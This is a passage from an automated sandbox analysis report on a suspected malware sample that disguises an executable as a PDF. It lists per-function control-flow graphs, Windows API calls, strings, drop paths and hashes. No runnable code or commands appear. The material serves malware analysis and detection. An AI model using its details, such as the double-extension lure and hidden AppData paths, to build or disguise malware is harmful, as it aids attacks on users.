                                                                  control_flow_graph 643 40264a-402663 call 402c1f 646 402ac5-402ac8 643->646 647 402669-402670 643->647 648 402ace-402ad4 646->648 649 402672 647->649 650 402675-402678 647->650 649->650 652 4027dc-4027e4 650->652 653 40267e-40268d call 4061e4 650->653 652->646 653->652 656 402693 653->656 657 402699-40269d 656->657 658 402732-402735 657->658 659 4026a3-4026be ReadFile 657->659 661 402737-40273a 658->661 662 40274d-40275d call 405dfd 658->662 659->652 660 4026c4-4026c9 659->660 660->652 664 4026cf-4026dd 660->664 661->662 665 40273c-402747 call 405e5b 661->665 662->652 671 40275f 662->671 667 4026e3-4026f5 MultiByteToWideChar 664->667 668 402798-4027a4 call 4061cb 664->668 665->652 665->662 667->671 672 4026f7-4026fa 667->672 668->648 674 402762-402765 671->674 675 4026fc-402707 672->675 674->668 677 402767-40276c 674->677 675->674 678 402709-40272e SetFilePointer MultiByteToWideChar 675->678 679 4027a9-4027ad 677->679 680 40276e-402773 677->680 678->675 681 402730 678->681 683 4027ca-4027d6 SetFilePointer 679->683 684 4027af-4027b3 679->684 680->679 682 402775-402788 680->682 681->671 682->652 687 40278a-402790 682->687 683->652 685 4027b5-4027b9 684->685 686 4027bb-4027c8 684->686 685->683 685->686 686->652 687->657 688 402796 687->688 688->652
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                    • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                  • String ID: 9
                                                                  • API String ID: 163830602-2366072709
                                                                  • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                  • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                  • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                  • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                  Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 689 4065ee-40660e GetSystemDirectoryW 690 406610 689->690 691 406612-406614 689->691 690->691 692 406625-406627 691->692 693 406616-40661f 691->693 695 406628-40665b wsprintfW LoadLibraryExW 692->695 693->692 694 406621-406623 693->694 694->695
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                  • wsprintfW.USER32 ref: 00406640
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-1946221925
                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                  • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                  • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98
                                                                  Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 696 403116-40312d 697 403136-40313e 696->697 698 40312f 696->698 699 403140 697->699 700 403145-40314a 697->700 698->697 699->700 701 40315a-403167 call 4032fb 700->701 702 40314c-403155 call 403311 700->702 706 4032b2 701->706 707 40316d-403171 701->707 702->701 708 4032b4-4032b5 706->708 709 403177-403197 GetTickCount call 4067bf 707->709 710 40329b-40329d 707->710 712 4032f4-4032f8 708->712 720 4032f1 709->720 722 40319d-4031a5 709->722 713 4032e6-4032ea 710->713 714 40329f-4032a2 710->714 715 4032b7-4032bd 713->715 716 4032ec 713->716 717 4032a4 714->717 718 4032a7-4032b0 call 4032fb 714->718 723 4032c2-4032d0 call 4032fb 715->723 724 4032bf 715->724 716->720 717->718 718->706 729 4032ee 718->729 720->712 726 4031a7 722->726 727 4031aa-4031b8 call 4032fb 722->727 723->706 733 4032d2-4032de call 405e2c 723->733 724->723 726->727 727->706 734 4031be-4031c7 727->734 729->720 739 4032e0-4032e3 733->739 740 403297-403299 733->740 736 4031cd-4031ea call 4067df 734->736 742 4031f0-403207 GetTickCount 736->742 743 403293-403295 736->743 739->713 740->708 744 403252-403254 742->744 745 403209-403211 742->745 743->708 746 403256-40325a 744->746 747 403287-40328b 744->747 748 403213-403217 745->748 749 403219-40324a MulDiv wsprintfW call 4052ec 745->749 750 40325c-403261 call 405e2c 746->750 751 40326f-403275 746->751 747->722 752 403291 747->752 748->744 748->749 754 40324f 749->754 757 403266-403268 750->757 756 40327b-40327f 751->756 752->720 754->744 756->736 758 403285 756->758 757->740 759 40326a-40326d 757->759 758->720 759->756
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$wsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 551687249-2449383134
                                                                  • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                  • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                  • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                  • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                                                  Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 760 4057bb-405806 CreateDirectoryW 761 405808-40580a 760->761 762 40580c-405819 GetLastError 760->762 763 405833-405835 761->763 762->763 764 40581b-40582f SetFileSecurityW 762->764 764->761 765 405831 GetLastError 764->765 765->763
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                  • GetLastError.KERNEL32 ref: 00405812
                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                  • GetLastError.KERNEL32 ref: 00405831
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 3449924974-224404859
                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                  • Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                  • Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9
                                                                  Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 766 405da9-405db5 767 405db6-405dea GetTickCount GetTempFileNameW 766->767 768 405df9-405dfb 767->768 769 405dec-405dee 767->769 771 405df3-405df6 768->771 769->767 770 405df0 769->770 770->771
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405DC7
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3), ref: 00405DE2
                                                                  Strings
                                                                  • nsa, xrefs: 00405DB6
                                                                  • "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe", xrefs: 00405DA9
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DAE, 00405DB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-381205748
                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                  • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                  • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64
                                                                  Function 6FBC177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 772 6fbc177b-6fbc17ba call 6fbc1b63 776 6fbc18da-6fbc18dc 772->776 777 6fbc17c0-6fbc17c4 772->777 778 6fbc17cd-6fbc17da call 6fbc2398 777->778 779 6fbc17c6-6fbc17cc call 6fbc2356 777->779 784 6fbc17dc-6fbc17e1 778->784 785 6fbc180a-6fbc1811 778->785 779->778 786 6fbc17fc-6fbc17ff 784->786 787 6fbc17e3-6fbc17e4 784->787 788 6fbc1831-6fbc1835 785->788 789 6fbc1813-6fbc182f call 6fbc256d call 6fbc15b4 call 6fbc1272 GlobalFree 785->789 786->785 795 6fbc1801-6fbc1802 call 6fbc2d2f 786->795 791 6fbc17ec-6fbc17ed call 6fbc2a74 787->791 792 6fbc17e6-6fbc17e7 787->792 793 6fbc1837-6fbc1880 call 6fbc15c6 call 6fbc256d 788->793 794 6fbc1882-6fbc1888 call 6fbc256d 788->794 813 6fbc1889-6fbc188d 789->813 804 6fbc17f2 791->804 797 6fbc17e9-6fbc17ea 792->797 798 6fbc17f4-6fbc17fa call 6fbc2728 792->798 793->813 794->813 807 6fbc1807 795->807 797->785 797->791 812 6fbc1809 798->812 804->807 807->812 812->785 814 6fbc188f-6fbc189d call 6fbc2530 813->814 815 6fbc18ca-6fbc18d1 813->815 822 6fbc189f-6fbc18a2 814->822 823 6fbc18b5-6fbc18bc 814->823 815->776 820 6fbc18d3-6fbc18d4 GlobalFree 815->820 820->776 822->823 824 6fbc18a4-6fbc18ac 822->824 823->815 825 6fbc18be-6fbc18c9 call 6fbc153d 823->825 824->823 826 6fbc18ae-6fbc18af FreeLibrary 824->826 825->815 826->823
                                                                  APIs
                                                                    • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DB6
                                                                    • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DBB
                                                                    • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DC0
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC1829
                                                                  • FreeLibrary.KERNEL32(?), ref: 6FBC18AF
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC18D4
                                                                    • Part of subcall function 6FBC2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6FBC2387
                                                                    • Part of subcall function 6FBC2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FBC17FA,00000000), ref: 6FBC27F8
                                                                    • Part of subcall function 6FBC15C6: lstrcpyW.KERNEL32(?,6FBC4020,00000000,6FBC15C3,?,00000000,6FBC1753,00000000), ref: 6FBC15DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                  • String ID:
                                                                  • API String ID: 1791698881-3916222277
                                                                  • Opcode ID: cef7c2a43fa771a68df89bcdfb243a7c62a758466f60e9659b88957345a796f0
                                                                  • Instruction ID: 22edcd096741470c1e1c1fb4e84c08ae4941c0f339454de7048aa3e0c512ae20
                                                                  • Opcode Fuzzy Hash: cef7c2a43fa771a68df89bcdfb243a7c62a758466f60e9659b88957345a796f0
                                                                  • Instruction Fuzzy Hash: 3541B0714043C5DADF009F34F884BCB37A8FF05315F085566E95ABA1C6DBB89185CB62
                                                                  Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,00000000,00000011,00000002), ref: 00402557
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CloseValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp
                                                                  • API String ID: 2655323295-378340024
                                                                  • Opcode ID: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                                                  • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                  • Opcode Fuzzy Hash: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                                                  • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                                                  Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                    • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow,?,00000000,000000F0), ref: 0040164D
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow, xrefs: 00401640
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow
                                                                  • API String ID: 1892508949-2362822837
                                                                  • Opcode ID: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                                                  • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                  • Opcode Fuzzy Hash: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                                                  • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                  Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                  • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                  • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                  • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                  Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
